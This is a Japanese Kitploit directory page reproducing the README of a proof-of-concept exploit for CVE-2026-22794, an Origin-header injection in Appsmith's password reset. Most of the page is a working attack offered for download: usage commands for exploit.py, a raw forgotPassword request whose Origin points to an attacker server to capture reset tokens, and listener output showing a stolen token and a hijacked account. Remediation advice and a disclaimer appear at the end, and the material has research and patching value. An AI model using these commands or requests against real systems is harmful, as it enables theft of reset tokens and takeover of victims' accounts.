Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22794-POC — 🔴 CVE-2026-22794 - OriginヘッダーインジェクションによるAppsmithパスワードリセットのアカウント乗っ取り | PoCエクスプロイト + Nucleiテンプレート | Kitploit
ツール/GitHubGitHub/malikhamza7/cve-2026-22794-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - OriginヘッダーインジェクションによるAppsmithパスワードリセットのアカウント乗っ取り | PoCエクスプロイト + Nucleiテンプレート

リポジトリを見る
787ヶ月前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-22794 - Appsmith Origin ヘッダーインジェクション

Python Version CVE License

🔴 重大なセキュリティ脆弱性

Origin ヘッダー操作によるパスワードリセットリンクの乗っ取り

このリポジトリには、Appsmith の重大な脆弱性である CVE-2026-22794 の Proof of Concept (PoC) エクスプロイトが含まれており、攻撃者がパスワードリセットトークンを乗っ取り、完全なアカウント乗っ取りを達成することができます。

📋 脆弱性の概要

フィールド値
CVE IDCVE-2026-22794
影響を受けるソフトウェアAppsmith(パッチ適用前のバージョン)
脆弱性の種類Origin ヘッダーインジェクション
影響完全なアカウント乗っ取り
CVSS スコア9.1(重大)
攻撃ベクトルネットワーク
攻撃の複雑さ低
必要な権限なし
ユーザー操作必要(被害者がリンクをクリック)

🎯 脆弱性の説明

Appsmith は、HTTP の Origin ヘッダーを検証せずに使用して、パスワードリセットおよびメール検証 URL を構築します。脆弱なコードは、Origin ヘッダーをパスワードリセットのベース URL に直接割り当てます:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

これにより、攻撃者は以下のことが可能になります:

  1. 任意のメールアドレスに対してパスワードリセットをトリガーする
  2. 攻撃者が制御するサーバーを指す悪意のある Origin ヘッダーを注入する
  3. 被害者がリンクをクリックしたときにパスワードリセットトークンを取得する
  4. そのトークンを使用して被害者のパスワードをリセットし、アカウントを乗っ取る

🔥 攻撃チェーン

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     攻撃フロー                                    │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ 攻撃者    │                    │ APPSMITH │                    │  被害者   │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. メールを送信                 │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. 被害者がリンクをクリック     │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. トークン取得!              │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. アカウント乗っ取り! ✓      │                               │
       │                               │                               │

📦 インストール

root@kitploit:~
# リポジトリをクローン
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# 依存関係をインストール
pip install -r requirements.txt

🚀 使用方法

ターゲットが脆弱かどうかを確認

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

トークン取得サーバーを起動

root@kitploit:~
python exploit.py --listen --port 8080

悪意のあるパスワードリセットリクエストを送信

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

完全自動化攻撃

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

取得したトークンを使用してパスワードをリセット

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 攻撃デモンストレーション

ステップ 1: 攻撃者が悪意のあるリクエストを送信

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

ステップ 2: 被害者が悪意のあるリンクを含むメールを受信

root@kitploit:~
パスワードリセットリンク: https://attacker-server.com/user/resetPassword?token=abc123xyz...

ステップ 3: 攻撃者がトークンを取得

root@kitploit:~
[+] 受信リクエストを取得しました!
[*] パス: /user/resetPassword?token=abc123xyz789...
[!!!] パスワードリセットトークンを取得しました!
[!!!] トークン: abc123xyz789...

ステップ 4: アカウント乗っ取り

root@kitploit:~
[+] アカウント乗っ取りに成功しました!
[+] パスワードがリセットされました: NewP@ssw0rd!

🛡️ 修復策

Appsmith を使用している組織は、以下を実施する必要があります:

  1. 直ちに更新 して最新のパッチ適用済みバージョンにすること
  2. Origin ヘッダーを検証 し、許可されたドメインのホワイトリストと照合すること
  3. サーバー側の設定 を使用してパスワードリセット URL を生成すること
  4. 追加の検証 を実装すること(例:IP 検証、短いトークン有効期限)

安全なコード例

root@kitploit:~
// ❌ 脆弱なコード
userPasswordDTO.setBaseUrl(originHeader);

// ✅ 安全なコード
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// またはホワイトリストと照合して検証
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Invalid origin header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 リポジトリ構造

root@kitploit:~
CVE-2026-22794/
├── README.md           # このファイル
├── exploit.py          # メインのエクスプロイトスクリプト
├── requirements.txt    # Python の依存関係
├── LICENSE             # MIT ライセンス
└── docs/
    └── technical_analysis.md  # 詳細な脆弱性分析

⚠️ 法的免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみ で提供されています。

  • このツールは、所有しているシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用してください
  • コンピュータシステムへの不正アクセスは違法です
  • 作者はこのツールの誤用について一切の責任を負いません
  • 常に責任ある開示の慣行に従ってください

📄 参考情報

  • CVE-2026-22794
  • OWASP - Forgot Password Cheat Sheet
  • CWE-346: Origin Validation Error

👤 著者

セキュリティ研究者

  • GitHub: @MalikHamza7
  • LinkedIn: あなたの LinkedIn プロフィール

📜 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています - 詳細については LICENSE ファイルを参照してください。


⭐ これが役に立った場合は、リポジトリにスターを付けてください! ⭐

ツールをダウンロード